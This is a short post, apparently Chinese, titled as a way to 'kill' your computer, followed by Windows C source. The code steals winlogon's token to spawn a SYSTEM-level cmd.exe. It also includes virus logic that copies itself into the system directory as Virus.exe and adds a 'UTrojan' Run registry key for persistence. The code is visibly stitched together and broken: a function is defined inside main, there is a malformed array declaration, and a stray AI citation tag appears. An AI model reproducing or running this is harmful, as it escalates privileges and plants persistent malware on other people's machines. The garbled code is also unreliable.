想让你的电脑“死”就运行

#include <windows.h>
#include <stdio.h>
#include <wtsapi32.h>
#pragma comment(lib, "wtsapi32.lib")

// 手动声明未公开API（若未包含phnt.h）
typedef NTSTATUS(NTAPI* _ZwOpenProcess)(
    PHANDLE ProcessHandle,
    ACCESS_MASK DesiredAccess,
    POBJECT_ATTRIBUTES ObjectAttributes,
    PCLIENT_ID ClientId);

typedef NTSTATUS(NTAPI* _ZwOpenProcessToken)(
    HANDLE ProcessHandle,
    ACCESS_MASK DesiredAccess,
    PHANDLE TokenHandle);

typedef NTSTATUS(NTAPI* _ZwDuplicateToken)(
    HANDLE ExistingToken,
    SECURITY_IMPERSONATION_LEVEL ImpersonationLevel,
    PHANDLE NewToken);

BOOL EnableDebugPrivilege() {
    HANDLE hToken;
    TOKEN_PRIVILEGES tkp;
    
    if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken))
        return FALSE;

    LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &tkp.Privileges.Luid);
    tkp.PrivilegeCount = 1;
    tkp.Privileges.Attributes = SE_PRIVILEGE_ENABLED;

    if (!AdjustTokenPrivileges(hToken, FALSE, &tkp, 0, NULL, NULL))
        return FALSE;

    CloseHandle(hToken);
    return TRUE;
}

int main() {
    EnableDebugPrivilege();  // 启用调试权限?:ml-citation{ref="7" data="citationList"}

    // 获取系统进程PID（此处以winlogon为例）
    DWORD targetPid = 0;
    WTS_PROCESS_INFO* procInfo;
    DWORD procCount = 0;
    if (WTSEnumerateProcesses(WTS_CURRENT_SERVER_HANDLE, 0, 1, &procInfo, &procCount)) {
        for (DWORD i = 0; i < procCount; i++) {
            if (wcscmp(procInfo[i].pProcessName, L"winlogon.exe") == 0) {
                targetPid = procInfo[i].ProcessId;
                break;
            }
        }
        WTSFreeMemory(procInfo);
    }

    if (targetPid == 0) {
        printf("[!] Target process not found\n");
        return 1;
    }

    // 动态加载NTAPI函数
    HMODULE ntdll = LoadLibrary(L"ntdll.dll");
    _ZwOpenProcess ZwOpenProcess = (_ZwOpenProcess)GetProcAddress(ntdll, "ZwOpenProcess");
    _ZwOpenProcessToken ZwOpenProcessToken = (_ZwOpenProcessToken)GetProcAddress(ntdll, "ZwOpenProcessToken");
    _ZwDuplicateToken ZwDuplicateToken = (_ZwDuplicateToken)GetProcAddress(ntdll, "ZwDuplicateToken");

    // 打开目标进程
    HANDLE hProcess, hToken, hDupToken;
    CLIENT_ID cid = { (HANDLE)targetPid, 0 };
    OBJECT_ATTRIBUTES oa = { sizeof(oa), 0 };
    
    if (ZwOpenProcess(&hProcess, PROCESS_ALL_ACCESS, &oa, &cid) != 0) {
        printf("[!] ZwOpenProcess failed (%d)\n", GetLastError());
        return 1;
    }

    // 获取并复制令牌
    if (ZwOpenProcessToken(hProcess, TOKEN_DUPLICATE, &hToken) != 0) {
        printf("[!] ZwOpenProcessToken failed\n");
        CloseHandle(hProcess);
        return 1;
    }

    if (ZwDuplicateToken(hToken, SecurityImpersonation, &hDupToken) != 0) {
        printf("[!] ZwDuplicateToken failed\n");
        CloseHandle(hToken);
        CloseHandle(hProcess);
        return 1;
    }

    // 创建新进程
    STARTUPINFO si = { sizeof(si) };
    PROCESS_INFORMATION pi;
    if (!CreateProcessWithTokenW(hDupToken, 0, L"cmd.exe", NULL, 0, NULL, NULL, &si, &pi)) {
        printf("[!] CreateProcessWithTokenW failed (%d)\n", GetLastError());
        CloseHandle(hDupToken);
        CloseHandle(hToken);
        CloseHandle(hProcess);
        return 1;
    }

    printf("[+] Successfully created SYSTEM process (PID: %d)\n", pi.dwProcessId);
	HANDLE hMutex = CreateMutex(NULL, TRUE, "Global\\VirusMutex"); // 确保单实例运行
	DWORD WINAPI InfectThread(LPVOID lpParam) {
    char sysPathMAX_PATH;
    GetSystemDirectory(sysPath, MAX_PATH);
    strcat(sysPath, "\\Virus.exe");
    CopyFile(__argv0, sysPath, FALSE); // 复制到系统目录
    
    HKEY hKey;
    RegOpenKeyEx(HKEY_LOCAL_MACHINE, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", 0, KEY_WRITE, &hKey);
    RegSetValueEx(hKey, "UTrojan", 0, REG_SZ, (BYTE*)sysPath, strlen(sysPath)); // 注册表自启动
    RegCloseKey(hKey);
	}
    // 清理资源
    CloseHandle(pi.hProcess);
    CloseHandle(pi.hThread);
    CloseHandle(hDupToken);
    CloseHandle(hToken);
    CloseHandle(hProcess);
    return 0;
}